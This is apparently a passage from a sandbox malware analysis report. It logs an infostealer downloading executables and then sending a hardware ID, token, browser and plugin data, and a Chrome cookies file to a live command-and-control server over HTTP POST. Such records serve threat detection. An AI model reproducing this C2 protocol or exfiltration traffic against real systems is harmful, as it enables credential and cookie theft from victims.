Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 21:40:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 21:40:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 21:40:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 21:40:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 21:40:52 GMTContent-Type: application/octet-streamContent-Length: 3234816Last-Modified: Sat, 07 Dec 2024 21:35:14 GMTConnection: keep-aliveETag: "6754bf92-315c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 60 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 31 00 00 04 00 00 ee 7e 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 4f 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 4f 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 6b 77 70 62 68 6f 62 00 a0 2a 00 00 b0 06 00 00 a0 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 74 66 75 62 6f 78 63 00 10 00 00 00 50 31 00 00 04 00 00 00 36 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 31 00 00 22 00 00 00 3a 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 4a 45 48 44 42 47 49 44 48 4a 4b 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 46 46 43 41 31 33 35 32 38 30 31 31 32 38 30 35 36 36 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 4a 45 48 44 42 47 49 44 48 4a 4b 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 4a 45 48 44 42 47 49 44 48 4a 4b 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------CAKKKJEHDBGIDHJKJDBFContent-Disposition: form-data; name="hwid"00FFCA1352801128056648------CAKKKJEHDBGIDHJKJDBFContent-Disposition: form-data; name="build"stok------CAKKKJEHDBGIDHJKJDBF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="message"browsers------BKJDGCGDAAAKECAKKJDA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 2d 2d 0d 0a Data Ascii: ------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="message"plugins------FHJDAAEGIDHDGCAAFCBA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="message"fplugins------AAAKEBGDAFHIIDHIIECF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAEHost: 185.215.113.206Content-Length: 6087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 